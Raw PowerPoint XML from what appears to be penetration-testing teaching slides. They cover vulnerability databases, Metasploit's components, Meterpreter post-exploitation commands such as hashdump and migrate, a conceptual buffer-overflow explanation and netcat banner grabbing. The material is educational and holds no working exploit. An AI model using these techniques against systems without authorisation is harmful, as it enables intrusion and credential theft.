            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200"/>
            <a:t>Focuses on the real-world risk a vulnerability poses to the specific organization.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" kern="1200"/>
            <a:t>Advantages</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200"/>
            <a:t>: Modern, risk-driven, dynamic scores.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" kern="1200"/>
            <a:t>Disadvantages</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" kern="1200"/>
            <a:t>: Not open-source, commercial platform required.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3614737" y="39687"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1787256F-ABA0-4DA3-BE17-5FCCF1F4E59F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7229475"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Vulnerability Research Resources</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7229475" y="39687"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{83C4CBFC-67B9-40FF-BE11-D6F2FA892C87}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0"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NVD (National Vulnerability Database)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200"/>
            <a:t>: A comprehensive list of all public vulnerabilities (CVEs).</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2339975"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3FA681EE-CD68-40DA-A3F5-A7756E995A9B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3614737"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Exploit-DB</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200"/>
            <a:t>: A repository of exploits for specific applications and software versions.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3614737" y="2339975"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{11BA2360-C4E1-4F61-854A-21BC11370288}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7229475"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Rapid7</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1600" kern="1200"/>
            <a:t>: Another database that combines vulnerability information with exploit instructions for Metasploit.</a:t>
          </a:r>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74B46-B3AB-420C-9ACE-8FB24A04CA82}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1168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Metasploit is the most popular exploitation framework</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="139618"/>
        <a:ext cx="10470022" cy="421252"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7DF1C796-21A1-4922-98F3-DAD725B0C2DE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="6383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Versions:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="661168"/>
        <a:ext cx="10470022" cy="421252"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EDB866F6-1F51-4F20-98C6-F7B4DB97EA2D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="11599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Pro:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Commercial, with GUI, for automation and task management.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="1182718"/>
        <a:ext cx="10470022" cy="421252"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B9D060DD-8E2B-4A0C-8DC5-58AC26111184}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="16814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Framework:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Open-source, command-line-based, widely used in penetration testing.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="1704268"/>
        <a:ext cx="10470022" cy="421252"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{30706354-438C-46A6-B64D-19293FA3DB25}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="22030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Main Components:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="2225818"/>
        <a:ext cx="10470022" cy="421252"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EBB49653-41C2-45C8-B287-7C49446E7483}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="27245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msfconsole:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Command-line interface.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="2747368"/>
        <a:ext cx="10470022" cy="421252"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{52E4B533-5A59-45EB-9D81-8825B2BCBC01}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="32461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Modules:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Exploits, scanners, payloads, etc.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="3268918"/>
        <a:ext cx="10470022" cy="421252"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{05EC6760-5BAA-4A0C-BF8B-26665C1A5594}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="37676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Tools:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Vulnerability research tools like msfvenom, pattern_create, etc.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="22789" y="3790468"/>
        <a:ext cx="10470022" cy="421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445E7-0C1B-42EE-9E74-F0D08A64DF81}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0"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exploits:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" kern="1200" baseline="0" dirty="0"/>
            <a:t> Code that takes advantage of system vulnerabilities.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1023132"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{562DBC2E-BA9C-413A-96B2-DA091289F5C4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1997575"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Payloads:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Code executed on the target system (e.g., getting a shell).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1997575" y="1023132"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8A66F3D3-0304-4741-A8A6-36A2C97DB8D9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3995150"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Module Categories:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3995150" y="1023132"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{21B58D07-9D6B-4835-A7E0-768BDEF82D38}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0"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Auxiliary:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Scanners, fuzzers.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2294316"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{60AD2604-05B9-4E37-8C91-EB278FFB0581}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1997575"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Encoders &amp; Evasion:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> For obfuscation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1997575" y="2294316"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2ABA6BC6-001A-489B-9869-97C53EADE9EA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3995150"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NOPs:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Used as buffers in payloads.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3995150" y="2294316"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{93AE452F-A568-415C-BC88-60FF84BA25B0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0"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Payloads:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" kern="1200" baseline="0"/>
            <a:t> Self-contained, staged, or split into stagers and stages.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3565500"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2E1FB6F7-9CD4-44FC-B1A7-DC3C600DFD20}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1997575"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Metasploit Commands:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1997575" y="3565500"/>
        <a:ext cx="1815977" cy="1089586"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C9DFE228-4138-4B53-9921-4E2E9EC0BAF7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3995150"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baseline="0"/>
            <a:t>use to select modules, search for exploits, exploit to run, set to configure parameters.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3995150" y="3565500"/>
        <a:ext cx="1815977" cy="1089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91548-E246-458E-97D2-E81065480C3A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1002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baseline="0"/>
            <a:t>Common Meterpreter Commands:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="120613"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2A546C41-F30E-4DD2-B93F-749E38C4D30E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5668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getuid: Shows current user.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="587263"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EC6D4EA5-4ADF-427B-AFC7-87C940916112}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="10335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ps: Lists running processes.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="1053913"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EC674932-F46F-4D16-93DC-D7029D44BF68}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="15001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dirty="0"/>
            <a:t>migrate [PID]: Moves Meterpreter to another process.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="1520563"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0D844CAF-9E8A-4E4B-B10E-64AF76F5D7A0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="19668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hashdump: Dumps password hashes from the SAM database.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="1987213"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EDB0521B-842A-4568-A04E-F67BA6338D0B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="24334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search: Locates files on the target system.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="2453863"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E967CF88-45B4-4213-ADC4-9CB269F40D61}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="290012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shell: Opens a command-line shell on the target.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="2920514"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F64B03BC-E257-4774-8FC0-C403B96CBA99}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="336677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baseline="0"/>
            <a:t>Post-Exploitation with Meterpreter:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="3387164"/>
        <a:ext cx="10474820" cy="376910"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9261F9A8-1A7D-47C7-9A52-E29B20F2EFCC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="383342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Privilege escalation, lateral movement, credential harvesting, and file searches are key post-exploitation tasks.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="20390" y="3853814"/>
        <a:ext cx="10474820" cy="3769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57C07-7A1F-44F1-809E-64C8EAC4CE73}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5214"/>
          <a:ext cx="7559504" cy="151039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Special attack that exploits the lack of input length validation to a buffer.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="73731" y="78945"/>
        <a:ext cx="7412042" cy="1362934"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1F0FF97D-C5C7-4F42-8DB8-02DB81EBDEA5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1593371"/>
          <a:ext cx="7559504" cy="1510396"/>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After that it overwrite the adjacent memory next to the buffer.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="73731" y="1667102"/>
        <a:ext cx="7412042" cy="1362934"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{16A0FE2A-5E7D-481C-8BA0-3EA62BB3D272}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3181528"/>
          <a:ext cx="7559504" cy="1510396"/>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 can exploit this behavior by overwriting the return address and make it point to my exploit in the machine.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="73731" y="3255259"/>
        <a:ext cx="7412042" cy="1362934"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F6AE7433-5EEC-4378-A05D-F3A839F6AD87}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4769685"/>
          <a:ext cx="7559504" cy="1510396"/>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Once the return address is overwritten and the function running is finished the machine will jump to the malicious code and execute it.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="73731" y="4843416"/>
        <a:ext cx="7412042" cy="13629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AE1B-884F-4774-B933-5D47C3004D94}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="39687"/>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0" i="0" kern="1200"/>
            <a:t>To grab the banner from a specific service :</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="39687"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1EE9BCD-97C5-4784-8487-A01747CA2ACE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3614737" y="39687"/>
          <a:ext cx="3286125" cy="1971675"/>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kern="1200"/>
            <a:t>nc &lt;target-ip&gt; &lt;port&gt;</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3614737" y="39687"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C2BB1FDC-D044-4462-8067-995DF0E6DFED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7229475" y="39687"/>
          <a:ext cx="3286125" cy="1971675"/>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kern="1200" dirty="0"/>
            <a:t>The output should be :</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7229475" y="39687"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C0CC8BE6-4EA5-4AF3-BBC1-1B6CF34BB096}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2339975"/>
          <a:ext cx="3286125" cy="1971675"/>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Date</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2800" b="0" i="0" kern="1200"/>
            <a:t>: The current date and time.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2339975"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{088FD0FD-CC52-435F-9C92-DC437C875497}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3614737" y="2339975"/>
          <a:ext cx="3286125" cy="1971675"/>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Server</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2800" b="0" i="0" kern="1200"/>
            <a:t>: The server software and version</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3614737" y="2339975"/>
        <a:ext cx="3286125" cy="1971675"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F7568511-0FBA-4AE6-87F0-2C49B8F7E410}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7229475" y="2339975"/>
          <a:ext cx="3286125" cy="1971675"/>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Content-Type</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2800" b="0" i="0" kern="1200"/>
            <a:t>: Information about the type of content being served.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="28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F1A8E-7BD0-4CA9-8857-B3AC75C7707A}"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29D55-5285-4EE8-90D8-692950ECB81C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395459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F29D55-5285-4EE8-90D8-692950ECB81C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296726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F29D55-5285-4EE8-90D8-692950ECB81C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206307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5122-3E1E-CE0C-C0DA-A2B3E72E04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0105C-85C4-B1BC-0BDF-7CCB6C87D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8E60F-6341-E76F-0420-7D038492D20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39FDA85A-2A4C-68E5-2A65-96A31F3A7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7BA85-2176-F669-CFF7-68A398F6BB8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93376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DB9A-1018-8B69-D9D6-E0FA05C9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97111-913C-B002-F87A-394E2692F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1A2F4-6005-AA7F-5E3C-31F35D0B23BB}"/>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84ACD266-5F83-F5C5-9615-D475E48CE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64AE2-A6FA-5BDC-FDCA-44F22C072C31}"/>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196834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E618EE-6550-C12E-246C-E7DBAEDAC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301FA0-B229-37C9-8AD9-BE8F0F0A32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90E90-FCD5-E463-DCEB-E59B4EEA75EC}"/>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3A4445DD-8719-733C-7FAB-AF4C4B52F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5C120-E284-F44B-A2EC-1534A8C231BA}"/>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826618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55418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9642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3846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7638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92289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37